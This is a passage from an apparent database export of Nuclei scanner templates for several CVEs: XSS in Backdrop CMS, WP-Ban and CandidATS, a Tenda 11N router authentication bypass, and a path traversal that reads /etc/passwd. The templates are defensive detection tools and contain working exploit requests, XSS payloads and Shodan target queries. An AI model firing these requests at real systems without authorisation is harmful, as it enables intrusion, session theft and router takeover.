\"{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f9dea7e19767e917eccb890bdc7a4b6effb2a1942275ba6bd15aa0362dc6b584022008f8c2bd3da536ba3f893eb70585ac286a8fb272343f3bb94fc865f1fceb68fc:922c64590222798bb761d5b6d8e72950", "hash": "02b8d76219f9eff34af66c5fcbeef92e", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30859e" }, "name": "CVE-2022-42094.yaml", "content": "id: CVE-2022-42094\n\ninfo:\n name: Backdrop CMS version 1.23.0 - Stored Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/backdrop/backdrop/releases/tag/1.23.0\n - https://github.com/bypazs/CVE-2022-42094\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42094\n - https://backdropcms.org\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2022-42094\n cwe-id: CWE-79\n epss-score: 0.0071\n epss-percentile: 0.80039\n cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: backdropcms\n product: backdrop\n tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms\n\nhttp:\n - raw:\n - |\n GET /?q=user/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /?q=user/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n - |\n GET /?q=node/add/card HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /?q=node/add/card HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY\n\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"title\"\n\n {{randstr}}\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\n Content-Type: application/octet-stream\n\n\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n 0\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n 1\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"changed\"\n\n\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"form_build_id\"\n\n {{form_id_2}}\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"form_token\"\n\n {{form_token}}\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"form_id\"\n\n card_node_form\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"body[und][0][value]\"\n\n \n\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"body[und][0][format]\"\n\n full_html\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"status\"\n\n 1\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"name\"\n\n {{name}}\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"date[date]\"\n\n 2023-04-13\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"date[time]\"\n\n 21:49:36\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"path[auto]\"\n\n 1\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"comment\"\n\n 1\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"op\"\n\n Save\n ------WebKitFormBoundaryWEcZgRB4detkrGaY--\n\n host-redirects: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \n - Backdrop CMS\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: form_id_1\n group: 1\n regex:\n - name=\"form_build_id\" value=\"(.*)\"\n internal: true\n\n - type: regex\n name: name\n group: 1\n regex:\n - name=\"name\" value=\"(.*?)\"\n internal: true\n\n - type: regex\n name: form_id_2\n group: 1\n regex:\n - name=\"form_build_id\" value=\"(.*)\"\n internal: true\n\n - type: regex\n name: form_token\n group: 1\n regex:\n - name=\"form_token\" value=\"(.*)\"\n internal: true\n# digest: 4a0a00473045022100833759ad52afd13abc5b49fcd770918213699021dbc4ed1ad7e66372e0f0548302201073403909a88ddab9ad7c88c79479b903f7d8b8dced717e7d8d0e89a6f05b3d:922c64590222798bb761d5b6d8e72950", "hash": "413ef23702f355e153d0fc35cdd4aae4", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30859f" }, "name": "CVE-2022-42095.yaml", "content": "id: CVE-2022-42095\n\ninfo:\n name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)\n author: theamanrawat\n severity: medium\n description: |\n Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/backdrop/backdrop/releases/tag/1.23.0\n - https://github.com/bypazs/CVE-2022-42095\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42095\n - https://backdropcms.org\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2022-42095\n cwe-id: CWE-79\n epss-score: 0.00283\n epss-percentile: 0.65226\n cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 5\n vendor: backdropcms\n product: backdrop_cms\n tags: cve2022,cve,xss,cms,backdrop,authenticated,backdropcms\n\nhttp:\n - raw:\n - |\n GET /?q=user/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /?q=user/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n - |\n GET /?q=node/add/page HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /?q=node/add/page HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n title={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save\n - |\n POST /?q={{randstr}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"status_code_5 == 200\"\n - \"contains(header_5, 'text/html')\"\n - 'contains(body_5, \"\")'\n - \"contains(body_5, 'Backdrop CMS')\"\n condition: and\n\n extractors:\n - type: regex\n name: form_id_1\n group: 1\n regex:\n - 'name=\"form_build_id\" value=\"(.*)\"'\n internal: true\n\n - type: regex\n name: form_id_2\n group: 1\n regex:\n - 'name=\"form_build_id\" value=\"(.*)\"'\n internal: true\n\n - type: regex\n name: form_token\n group: 1\n regex:\n - 'name=\"form_token\" value=\"(.*)\"'\n internal: true\n# digest: 490a004630440220034fd820495574945439e0f2771b2d730d3e01fc650ba5df79aa66b3e608f66f0220265468d28c9449a6e73199f71f1dc5cbdba0efdb3834a6dc0642156047d88771:922c64590222798bb761d5b6d8e72950", "hash": "f5048b9b1359010f4486d24b7c102c0c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a0" }, "name": "CVE-2022-42096.yaml", "content": "id: CVE-2022-42096\n\ninfo:\n name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)\n author: theamanrawat\n severity: medium\n description: |\n Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.\n remediation: |\n Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/backdrop/backdrop/releases/tag/1.23.0\n - https://github.com/bypazs/CVE-2022-42096\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42096\n - https://backdropcms.org\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2022-42096\n cwe-id: CWE-79\n epss-score: 0.00345\n epss-percentile: 0.68611\n cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 5\n vendor: backdropcms\n product: backdrop_cms\n tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms\n\nhttp:\n - raw:\n - |\n GET /?q=user/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /?q=user/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n - |\n GET /?q=node/add/post HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /?q=node/add/post HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp\n\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"title\"\n\n {{randstr}}\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"field_tags[und]\"\n\n {{randstr}}\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"body[und][0][summary]\"\n\n\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"body[und][0][value]\"\n\n \n\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"body[und][0][format]\"\n\n full_html\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\n Content-Type: application/octet-stream\n\n\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n 0\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n 1\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"changed\"\n\n\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"form_build_id\"\n\n {{form_id_1}}\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"form_token\"\n\n {{form_token}}\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"form_id\"\n\n {{form_id_2}}\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"status\"\n\n 1\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"scheduled[date]\"\n\n 2023-04-25\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"scheduled[time]\"\n\n 16:59:23\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"promote\"\n\n 1\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"name\"\n\n {{name}}\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"date[date]\"\n\n 2023-04-24\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"date[time]\"\n\n 16:59:23\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"path[auto]\"\n\n 1\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"comment\"\n\n 2\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"op\"\n\n Save\n ------WebKitFormBoundaryIubltUxssi0yqDjp--\n - |\n GET /?q=posts/{{randstr}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \n - Backdrop CMS\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: form_id_1\n group: 1\n regex:\n - name=\"form_build_id\" value=\"(.*)\"\n internal: true\n\n - type: regex\n name: name\n group: 1\n regex:\n - name=\"name\" value=\"(.*?)\"\n internal: true\n\n - type: regex\n name: form_id_2\n group: 1\n regex:\n - name=\"form_id\" value=\"(.*)\"\n internal: true\n\n - type: regex\n name: form_token\n group: 1\n regex:\n - name=\"form_token\" value=\"(.*)\"\n internal: true\n# digest: 4a0a00473045022100d511f8ca03bfd62c3ce9d4eb61ca34977675265bb516ecfc806a64e8785b81d6022041909cc1f36dc06c223ccc56a5e642045be29cfddd45f69658f28149169cf16e:922c64590222798bb761d5b6d8e72950", "hash": "13cc5da2b17b2458c93253dfb8cf7b2a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a1" }, "name": "CVE-2022-42233.yaml", "content": "id: CVE-2022-42233\n\ninfo:\n name: Tenda 11N - Authentication Bypass\n author: For3stCo1d\n severity: critical\n description: |\n Tenda 11N with firmware version V5.07.33_cn contains an authentication bypass vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n remediation: |\n Apply the latest firmware update provided by Tenda to fix the authentication bypass vulnerability (CVE-2022-42233).\n reference:\n - https://github.com/D0ngsec/vulns/blob/main/Tenda/Tenda_11N_Authentication_Bypass.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42233\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-42233\n cwe-id: CWE-287\n epss-score: 0.87277\n epss-percentile: 0.9839\n cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: tenda\n product: 11n_firmware\n shodan-query: http.title:\"Tenda 11N\"\n fofa-query: product==\"Tenda-11N-Wireless-AP\"\n tags: cve,cve2022,tenda,auth-bypass,router,iot\n\nhttp:\n - raw:\n - |\n GET /index.asp HTTP/1.1\n Host: {{Hostname}}\n Cookie: admin\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'def_wirelesspassword'\n - 'Tenda 11N'\n case-insensitive: true\n condition: and\n\n - type: word\n part: header\n words:\n - 'GoAhead-Webs'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b86e4c63dbaa65f20b84e2935e6d84f986fd943c6f626ad3a2d1b00526ea1d4c022071e2e1880c20e23bb3959dfd91cb4b52727a1129c9cc198ff74b8e5674d0c96a:922c64590222798bb761d5b6d8e72950", "hash": "3bbbf0385fc825d9bc834272cc24dd15", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a2" }, "name": "CVE-2022-4260.yaml", "content": "id: CVE-2022-4260\n\ninfo:\n name: WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting\n author: Hardik-Solanki\n severity: medium\n description: |\n WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, which can allow high-privilege users to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in multisite setup.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further compromise of the affected system.\n remediation: Fixed in version 1.69.1\n reference:\n - https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260\n - https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2022-4260\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.38207\n cpe: cpe:2.3:a:wp-ban_project:wp-ban:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: wp-ban_project\n product: wp-ban\n framework: wordpress\n tags: cve,cve2022,wp-plugin,xss,wordpress,wpscan,wp,authenticated,wp-ban,wp-ban_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1\n Host: {{Hostname}}\n\n _wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n Referer: XSS\n\n host-redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_4, \"\")'\n - 'contains(content_type_4, \"text/html\")'\n - 'status_code_4 == 200'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - '_wpnonce=([0-9a-z]+)'\n internal: true\n part: body\n# digest: 4a0a00473045022054e0cb92b1de30b9a6096c941364f4ef3dd2f229205099d8588224ea2f58f6c7022100ff925bcaa75297254f5780ad4137c14bd3e834a259440ea032f8b9a86bfc8fb1:922c64590222798bb761d5b6d8e72950", "hash": "58581a8d64277ee574d8124ccc6f8df0", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a3" }, "name": "CVE-2022-42746.yaml", "content": "id: CVE-2022-42746\n\ninfo:\n name: CandidATS 3.0.0 - Cross-Site Scripting.\n author: arafatansari\n severity: medium\n description: |\n CandidATS 3.0.0 contains a cross-site scripting vulnerability via the indexFile parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS.\n reference:\n - https://fluidattacks.com/advisories/modestep/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42746\n - https://candidats.net/\n - https://github.com/Henry4E36/POCS\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-42746\n cwe-id: CWE-79\n epss-score: 0.00109\n epss-percentile: 0.42811\n cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: auieo\n product: candidats\n shodan-query: http.html:\"CandidATS\"\n tags: cve,cve2022,candidats,xss,auieo\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'candidat'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 404\n# digest: 4a0a00473045022100e05a50a6e132bac1f32ae519749f19608d564459b4cf2f5bc78878bc392979d802205e3df75d54d4f3d858178677f1d15edc59f2dcba8a7121a985e690d1131a06b9:922c64590222798bb761d5b6d8e72950", "hash": "51e7da4c4596e5005fb718a165fad1b9", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a4" }, "name": "CVE-2022-42747.yaml", "content": "id: CVE-2022-42747\n\ninfo:\n name: CandidATS 3.0.0 - Cross-Site Scripting.\n author: arafatansari\n severity: medium\n description: |\n CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortBy parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the application.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS.\n reference:\n - https://fluidattacks.com/advisories/modestep/\n - https://fluidattacks.com/advisories/jcole/\n - https://candidats.net/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42747\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-42747\n cwe-id: CWE-79\n epss-score: 0.00109\n epss-percentile: 0.43507\n cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: auieo\n product: candidats\n shodan-query: http.html:\"CandidATS\"\n tags: cve,cve2022,candidats,xss,auieo\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc&indexFile=1&isPopup=0'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'candidat'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 404\n# digest: 4a0a004730450220674c64cb82f47fccf84aa02992e2383beb4ef86186c3540610bd5302bbaeb13e0221008dd0a1ac41467e3520b176248f8c8292dfdabd050f6915f34a0a248f760782b2:922c64590222798bb761d5b6d8e72950", "hash": "e9ad2d1058169d33defb975ad6803ad0", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a5" }, "name": "CVE-2022-42748.yaml", "content": "id: CVE-2022-42748\n\ninfo:\n name: CandidATS 3.0.0 - Cross-Site Scripting.\n author: arafatansari\n severity: medium\n description: |\n CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.\n reference:\n - https://fluidattacks.com/advisories/modestep/\n - https://fluidattacks.com/advisories/jcole/\n - https://candidats.net/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42748\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-42748\n cwe-id: CWE-79\n epss-score: 0.00109\n epss-percentile: 0.42811\n cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: auieo\n product: candidats\n shodan-query: http.html:\"CandidATS\"\n tags: cve,cve2022,candidats,xss,auieo\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'candidat'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 404\n# digest: 4a0a00473045022100bb5ffd4b21e445cf4234b76fc85113266a75cdbb2da6bb13444795dc3af242f1022022a7de122c708996659ebc47a7766409e68978393245344a63e8f68221e40060:922c64590222798bb761d5b6d8e72950", "hash": "b264e2475e10ea535b167ab3b690fb0a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a6" }, "name": "CVE-2022-42749.yaml", "content": "id: CVE-2022-42749\n\ninfo:\n name: CandidATS 3.0.0 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS.\n reference:\n - https://fluidattacks.com/advisories/modestep/\n - https://fluidattacks.com/advisories/jcole/\n - https://candidats.net/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42749\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-42749\n cwe-id: CWE-79\n epss-score: 0.00109\n epss-percentile: 0.42811\n cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: auieo\n product: candidats\n shodan-query: http.html:\"CandidATS\"\n tags: cve,cve2022,candidats,xss,auieo\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'candidat'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n condition: and\n\n - type: status\n status:\n - 404\n# digest: 4a0a0047304502210089fe04a15e4eed93eec92622f8f739ff1ae8fbf29d5bbed7f4d299bb7ea9e38a0220668d4c0c8de7a37e6d9c004beb28ba0b5f40262c4252936318e4798275678c65:922c64590222798bb761d5b6d8e72950", "hash": "2fa4f685e354f610f41fbe933992dd6e", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a7" }, "name": "CVE-2022-4295.yaml", "content": "id: CVE-2022-4295\n\ninfo:\n name: Show all comments < 7.0.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of 